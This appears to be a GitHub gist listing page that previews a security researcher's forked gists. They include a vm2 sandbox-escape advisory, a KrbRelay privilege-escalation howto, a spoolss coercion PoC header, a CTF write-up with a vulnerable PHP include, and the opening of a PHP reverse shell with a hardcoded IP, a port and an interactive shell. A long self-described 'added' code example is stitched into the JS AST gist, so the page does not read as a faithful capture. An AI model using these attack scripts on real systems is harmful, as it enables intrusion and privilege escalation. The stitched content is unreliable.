0xfd FDlucifer
❄️ fd 2-bits..
FDlucifer / js_ast.md
Created May 29, 2025 09:33 — forked from snailkn/js_ast.md
Simple applications of the JS AST: parsing, modifying, and formatting

JS - AST basic concepts

AST is the abbreviation of Abstract Syntax Tree. An AST is an abstract decomposition of the logic of JS code: it breaks the code's computation down into fine-grained steps and stores them as a tree in evaluation order. With an AST we can implement many things, for example syntax highlighting, syntax checking and code obfuscation; babel processes JS code on the basis of the AST. Operations on an AST boil down to three kinds:

  • parse JS code into an AST
  • modify the AST as required
  • format (generate) the AST back into JS code

Fortunately, the JS ecosystem already has mature tools that implement these for us
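The three operations above, parse, modify and generate, carried out end to end on a small expression subset of JavaScript. This is an added example, not code from the gist or from babel: a hand-written tokenizer and precedence-climbing parser stand in for @babel/parser so that it runs with no npm packages, while the node shapes (Identifier, NumericLiteral, StringLiteral, BinaryExpression) follow Babel's naming. The modification step is the constant folding a deobfuscator applies to strings hidden as "a"+"le"+"rt", plus the identifier renaming an obfuscator applies in the other direction; `rewrite`, `foldConstants` and the `renames` map are names chosen for this example.

```javascript
// Added example: parse -> modify -> generate for a JS expression subset
// (identifiers, numbers, double-quoted strings, + - * /, parentheses).
// Node shapes follow Babel; the parser itself is hand-written for this example.

const PREC = { '+': 1, '-': 1, '*': 2, '/': 2 };

// 1. Parse: source text -> tokens -> tree (precedence climbing).
function tokenize(src) {
  const re = /\s*(?:(\d+(?:\.\d+)?)|([A-Za-z_$][\w$]*)|"((?:[^"\\]|\\.)*)"|([-+*\/()]))/y;
  const tokens = [];
  src = src.trim();
  while (re.lastIndex < src.length) {
    const at = re.lastIndex;
    const m = re.exec(src);
    if (!m) throw new SyntaxError(`unexpected input at offset ${at}`);
    if (m[1] !== undefined) tokens.push({ type: 'num', value: Number(m[1]) });
    else if (m[2] !== undefined) tokens.push({ type: 'id', value: m[2] });
    else if (m[3] !== undefined) tokens.push({ type: 'str', value: JSON.parse(`"${m[3]}"`) });
    else tokens.push({ type: 'op', value: m[4] });
  }
  return tokens;
}

function parse(src) {
  const tokens = tokenize(src);
  let pos = 0;
  const peek = () => tokens[pos];
  function primary() {
    const t = tokens[pos++];
    if (!t) throw new SyntaxError('unexpected end of input');
    if (t.type === 'num') return { type: 'NumericLiteral', value: t.value };
    if (t.type === 'str') return { type: 'StringLiteral', value: t.value };
    if (t.type === 'id') return { type: 'Identifier', name: t.value };
    if (t.value === '(') {
      const inner = binary(1);
      if (!peek() || tokens[pos++].value !== ')') throw new SyntaxError('expected )');
      return inner;
    }
    throw new SyntaxError(`unexpected token ${t.value}`);
  }
  function binary(minPrec) {
    let left = primary();
    while (peek() && peek().type === 'op' && PREC[peek().value] >= minPrec) {
      const operator = tokens[pos++].value;
      const right = binary(PREC[operator] + 1);   // left-associative
      left = { type: 'BinaryExpression', operator, left, right };
    }
    return left;
  }
  const ast = binary(1);
  if (pos !== tokens.length) throw new SyntaxError('trailing input');
  return ast;
}

// 2. Modify: post-order traversal, so a parent sees its already-rewritten
// children and constant folding collapses whole subtrees in one pass.
function transform(node, visit) {
  if (node.type === 'BinaryExpression') {
    node = { ...node, left: transform(node.left, visit), right: transform(node.right, visit) };
  }
  return visit(node);
}

const isLiteral = (n) => n.type === 'NumericLiteral' || n.type === 'StringLiteral';

// Constant folding with JS semantics for this subset: '+' concatenates when
// either side is a string; the other operators fold only for two numbers.
function foldConstants(node) {
  if (node.type !== 'BinaryExpression' || !isLiteral(node.left) || !isLiteral(node.right)) return node;
  const a = node.left.value, b = node.right.value;
  if (node.operator === '+') {
    const v = a + b;
    return typeof v === 'string' ? { type: 'StringLiteral', value: v } : { type: 'NumericLiteral', value: v };
  }
  if (typeof a !== 'number' || typeof b !== 'number') return node;
  const v = node.operator === '-' ? a - b : node.operator === '*' ? a * b : a / b;
  return { type: 'NumericLiteral', value: v };
}

// 3. Generate: tree -> source text, parenthesizing only where the tree shape
// would otherwise be lost (a - (b - c) must not come back as a - b - c).
function generate(node) {
  switch (node.type) {
    case 'NumericLiteral': return String(node.value);
    case 'StringLiteral': return JSON.stringify(node.value);
    case 'Identifier': return node.name;
    case 'BinaryExpression': {
      const p = PREC[node.operator];
      const wrap = (child, needParens) => {
        const s = generate(child);
        return child.type === 'BinaryExpression' && needParens(PREC[child.operator]) ? `(${s})` : s;
      };
      return `${wrap(node.left, (cp) => cp < p)} ${node.operator} ${wrap(node.right, (cp) => cp <= p)}`;
    }
    default: throw new TypeError(`unknown node ${node.type}`);
  }
}

// Whole pipeline: fold constants and optionally rename identifiers. hasOwnProperty
// keeps names like "constructor" from matching Object.prototype entries.
function rewrite(src, renames = {}) {
  const ast = parse(src);
  const out = transform(ast, (n) => {
    if (n.type === 'Identifier' && Object.prototype.hasOwnProperty.call(renames, n.name)) {
      return { type: 'Identifier', name: renames[n.name] };
    }
    return foldConstants(n);
  });
  return generate(out);
}
```

`rewrite('"a" + "le" + "rt"')` yields `"alert"` and `rewrite('x * (2 + 3) - (y - 1)', { x: 'width', y: 'height' })` yields `width * 5 - (height - 1)`. With babel the same job is `@babel/parser` for step 1, `@babel/traverse` with a visitor for step 2 and `@babel/generator` for step 3; the post-order visit order matters in exactly the same way there (fold on `exit`, not `enter`), otherwise an outer `+` is visited before its inner operands have become literals.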

@FDlucifer
FDlucifer / vm2_3.9.16_sandbox_escape.md
Created April 7, 2024 01:14 — forked from leesh3288/vm2_3.9.16_sandbox_escape.md
Sandbox Escape in vm2@3.9.16

Sandbox Escape in vm2@3.9.16

Summary

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

Proof of Concept

@FDlucifer
FDlucifer / krbrelay_privesc_howto.md
Created May 31, 2023 04:59 — forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-fix local privilege escalation from a low-privileged domain user to local SYSTEM on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@FDlucifer
FDlucifer / dementor.py
Created May 30, 2023 05:15 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Using YAML.dump(payload) in the above script doesn't work; it only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
@FDlucifer
FDlucifer / WorldWritableDirs.txt
Created April 2, 2023 04:26 — forked from mattifestation/WorldWritableDirs.txt
World-writable directories in %windir%
c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
@FDlucifer
FDlucifer / slideshare-dl.py
Created February 20, 2023 10:02 — forked from julionc/slideshare-dl.py
slideshare-dl is a small command-line program for downloading slides from SlideShare.net
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
slideshare-dl.py
~~~~~~~~~~~~~~~~
slideshare-dl is a small command-line program
for downloading slides from SlideShare.net
"""
import base64
import re
import xml.dom.minidom
import json
import uuid
import struct
import string
import random
import hashlib
import time
@FDlucifer
FDlucifer / writeup.md
Created January 22, 2023 08:41 — forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@FDlucifer
FDlucifer / reverse-shell.php
Created January 22, 2023 08:03 — forked from noobpk/reverse-shell.php
Php Reverse Shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.12'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';